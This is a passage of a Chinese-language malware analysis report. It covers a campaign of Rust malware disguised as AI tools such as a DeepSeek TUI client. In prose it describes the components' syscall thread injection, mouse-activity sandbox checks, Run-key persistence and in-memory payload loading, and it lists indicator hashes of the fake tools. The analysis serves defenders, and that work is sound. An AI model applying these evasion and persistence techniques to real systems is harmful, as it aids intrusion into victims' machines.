style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">[-] Failed to create CLR instance:</span></span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">通过NT syscall实现线程注入，直接用syscall的方式调用SuspendThread、SetThreadContext、NtCreateNamedPipeFile、NtWriteFile。</span></p><p nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.67125" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100034993" src="https://wechat2rss.xlab.app/img-proxy/?k=8fa507a9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOq9cr27AKw3CGKribroNr7LjgA0dr2pLUePQcPicSEN4B7vjHcHQa5bB8llG6ys6nH3zAmMkCUacNP0xQfeCgdW6eWiaSIsdSyS2SM%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该组织也存在鼠标检测功能，具有字符串”[*] Checking for user activity (Mouse)...”，”[+] User activity detected.”，保证运行环境是真实受害者系统。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">(3) onedrive_sync.exe</span></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这是个32位（x86）组件，主函数sub_402EB0，主要功能为：建立互斥→复制到伪装路径→Run键自启动→WaitableTimer延时→memexec内存装载后续PE。攻击者不需要把全部希望押在 svc_service.exe 的高权限驻留——不适合服务化驻留的主机仍然靠Run键+内存执行维持攻击链条。</span></p><p nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6225" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100034992" src="https://wechat2rss.xlab.app/img-proxy/?k=c14dab81&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOq8RZ2TCrkY1Jm1picB0lYEZnDKRjzCsunkMgWt6qIxxRm65ax4V1Sg4vBledcgjiaujoKgMjcMGicgWQw49E3TaosibhAjsL64nkuc%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">(4) autodate.exe</span></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该组件伪装为服务管理器，实际上是通过NtAllocateVirtualMemory、NtProtectVirtualMemory、UnsupportedDotNetExecutable、memexec、GetProcAddress、CreateWaitableTimerExW等函数将后续载荷加载进内存执行。伪装配置如下：</span></p><p nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.60375" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100034991" src="https://wechat2rss.xlab.app/img-proxy/?k=4d569b08&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqicIYnAybgDCStpsRoFbLsiafGxEgXH1Hn4icnyh73eExQWShmxUCJIKeDakYbXckBVCS9SeuiaNoBWL0J1GjO9Eiao078zcMqFl82I%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">(5) vicloud.exe</span></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">功能与autodate.exe高度相似，伪装配置不同。</span></p><p nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.58375" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100034996" src="https://wechat2rss.xlab.app/img-proxy/?k=78050409&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqicRQyRSdJ0Sx65e3C9H4FdicAcyxNwRtLwLhYY0G96WsluauWT33bysPmibqXtmu5ZXOl0ib8ZiaIIAgLeEcL3ptkcr2uMtUibMBODo%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">溯源关联</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该恶意软件的攻击方式与仿冒OpenClaw的恶意软件[1, 2]如出一辙，并且样本使用的下载URL和C2域名也有重叠，表明此次仿冒DeepSeek TUI项目的恶意软件是长期攻击活动的一部分。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">根据样本携带的PDB路径&#34;ClawCode.pdb&#34;，关联到多个类似的用Rust编写的恶意文件，大部分仿冒名称都与AI相关。</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">MD5</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">编译时间</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">仿冒名称</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">7de2896e373342e0f3b765c855bf7396</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 08:30:56 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">bbg_free_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">78c11c45c00a9c22f537c59a472beca1</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-27 11:47:52 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CatGatekeeper_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">df36a31148d2c6414bdafeab771ea728</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-27 12:32:54 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CatGatekeeper_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">14920c9751d20452a1006d20b8e73234</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-27 13:44:27 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CatGatekeeper_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">f6d328422e7ca22e70a6aa71315450f3</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 08:37:03 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CatGatekeeper_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">86c7f2a3c307928daaca7c1df3ea5d72</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 08:38:34 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CatGatekeeper_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">dbaa133fd3d1a834460206d83b480f80</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-27 12:36:35 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ClaudeDesign-Optimized_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">22c0c7d441fd22432cfe7854b59ba82b</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 08:43:07 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ClaudeDesign-Optimized_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">a224f44bdac16250d8093df68e05b512</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 08:40:05 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">DeepSeek-TUI_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">6861fa47889e0340ab7efaab448c56b6</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 08:41:36 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">DeepSeek-TUI_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">437e4bdb12d7fa8d1c9a9e9db84b8726</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 09:22:41 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">DeepSeek-TUI_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">fbfe7513685913e6f878647eec429d45</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-27 11:59:59 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">deepseek-v4-pro_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">562d48524313d414b5a419fed6ca10aa</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 09:30:25 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">DV4-MCP-Setup.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">df8a2e7aa46af996bdf67d79601671c3</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-27 12:38:22 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">fraudGPT_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">f101a346502a324320f952d39e217064</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 09:52:02 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">fraudGPT_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">5d14461718b74b86fdd68c6aee801dc4</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 09:28:47 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">GLM5-Local_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">556b35236eeb111b0606d88a7aa3fd87</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-27 11:58:08 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">gpt-image-2-desktop.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ff371b43786cbb87dab325ce17cf8b7c</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 08:46:08 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">gpt-image-2-desktop.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">1bd1df4f228ecd29a9b6fab48beaa366</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 09:34:59 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">GrokCLI_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">975bd8eb56716adbcadb5216592a17c7</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 